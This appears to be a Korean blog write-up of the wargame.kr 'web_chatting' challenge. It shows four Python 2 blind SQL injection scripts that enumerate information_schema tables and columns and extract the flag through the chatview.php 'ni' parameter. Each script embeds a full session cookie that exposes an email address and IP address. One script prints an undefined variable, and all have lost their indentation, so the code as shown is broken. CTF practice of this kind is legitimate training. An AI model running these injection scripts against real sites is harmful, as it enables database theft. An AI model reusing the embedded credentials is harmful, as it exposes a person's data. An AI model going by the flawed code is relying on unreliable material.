문제 화면입니다.
sql injection 문제네요. 개발자 관점에서 생각해보라는 힌트가 주어졌습니다.
아이디를 입력하는 창이 나옵니다. 아무거나 입력보겠습니다.
간단한 채팅 화면이 나옵니다. 입력하면 조금의 딜레이가 있은 후 채팅이 실시간으로 보여집니다.
소스코드에서 chatlog.php?t=1을 해보면 어떤 수가 나옵니다. 채팅을 또 친 후 들어가보면 수가 늘어나 있습니다. 아마 현재까지 누적된 채팅 수와 관련이 있는것 같습니다.
소스코드에 나온대로 chatview.php?t=1&ni= 에서 20808을 입력하니 아무것도 안뜹니다. 하지만 20807을 넣으면 방금 입력한 채팅이 나옵니다.
그리고 20806을 입력하면 그 전 채팅까지 총 두개가 나옵니다.
따라서 ni에 값을 입력하면 (제일 마지막에 입력한 채팅 number - 입력한 값) 까지 해서 그 수만큼 보여주는거로 추정됩니다.
그리고 ni에 인젝션을 시도해봤는데 먹히는걸로 봐선 이 부분을 통해 문제를 풀어야할것 같습니다.
union을 통해 select 해오겠습니다.
union 에선 select 하려면 이전 함께 가져오는 수를 맞춰줘야 하므로 개수를 추측하면서 select 해보니 다섯개를 select 하면 뽑을 수 있습니다.
제일 아래에 chat_log_secret이 제일 의심가는 테이블입니다. 연습을 위해 파이썬으로 테이블 개수를 가져오고 거기서 테이블명, 더 나아가 칼럼을 구해보도록 하겠습니다.
#테이블 개수
import urllib2, re, sys
print "[+] Start!"
for i in range(50):
dat = "t=1&ni=20798%20and%20if((select%20count(table_name)%20from%20information_schema.tables)="+str(i)+",20798,5555555)"
url = "http://wargame.kr:8080/web_chatting/chatview.php?" + dat
req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
res = urllib2.urlopen(req).read()
if "font-size:12px;" in res:
print "[+] SUCCESS!"
print "[*] counting : " + str(i)
break
sys.exit(1)
테이블의 개수는 0부터 41인덱스 까지 42개입니다.
#테이블 이름 추출
import urllib2, re
n = 0
print "[+] Start!"
while(n<42):
table = ""
for i in range(40):
for j in range(48,97):
dat = "t=1&ni=20798%20and%20if(substring((select%20table_name%20from%20information_schema.tables%20limit%20+"+str(n)+",1),"+str(i+1)+",1)=0x"+hex(j)[2:]+",20798,5555555)"
url = "http://wargame.kr:8080/web_chatting/chatview.php?"+dat
req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
res = urllib2.urlopen(req).read()
if "font-size:12px;" in res:
table += chr(j)
break
print "find table : " + table
n += 1
print "[+] Finish!"
제일 아래의 chat_log_secret 테이블이 나옵니다.
이제 칼럼의 수를 구해보겠습니다.
#칼럼 개수
import urllib2, re, sys
print "[+] Start!"
for i in range(500):
dat = "t=1&ni=20798%20and%20if((select%20count(column_name)%20from%20information_schema.columns)="+str(i)+",20798,5555555)"
url = "http://wargame.kr:8080/web_chatting/chatview.php?" + dat
req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
res = urllib2.urlopen(req).read()
if "font-size:12px;" in res:
print "[+] SUCCESS!"
print "[*] counting : " + str(i)
break
sys.exit(1)
486개의 칼럼이 존재합니다. 이제 칼럼 이름을 알아내보도록 하겠습니다.
#칼럼 이름
import urllib, urllib2, re, sys, time, os
n = 0
print "[+] Start!"
while(n<487):
column = ""
for i in range(40):
for j in range(48,97):
dat = "t=1&ni=20798%20and%20if(substring((select%20column_name%20from%20information_schema.columns%20limit%20+"+str(n)+",1),"+str(i+1)+",1)=0x"+hex(j)[2:]+",20798,5555555)"
url = "http://wargame.kr:8080/web_chatting/chatview.php?"+dat
req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
res = urllib2.urlopen(req).read()
if "font-size:12px;" in res:
column += chr(j)
break
print "find column : " + key
n += 1
print "[+] Finish!"
의심가는 칼럼은 readme입니다.
테이블과 칼럼을 구했으니 플래그를 구해보겠습니다.
import urllib2, re
print "[+] Start!"
flag = ""
for i in range(40):
for j in range(48,97):
dat = "t=1&ni=20798%20and%20if(substring((select%20readme%20from%20chat_log_secret%20limit%200,1),"+str(i+1)+",1)=0x"+hex(j)[2:]+",20798,55555)"
url = "http://wargame.kr:8080/web_chatting/chatview.php?"+dat
req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
res = urllib2.urlopen(req).read()
if "font-size:12px;" in res:
flag += chr(j)
break
print "[*] FLAG : " + flag
print "[+] Finish!"
플래그를 구했습니다.
'Wargame > wargame.kr' 카테고리의 다른 글
| wargame.kr simple board (0) | 2017.02.19 |
|---|---|
| wargame.kr dmbs335 700p (0) | 2016.10.04 |
| wargame.kr jff3_magic 800p (0) | 2016.09.03 |
| wargame.kr 4번 login filtering 450p (0) | 2016.07.25 |
| wargame.kr 3번 flee button 450p (0) | 2016.07.25 |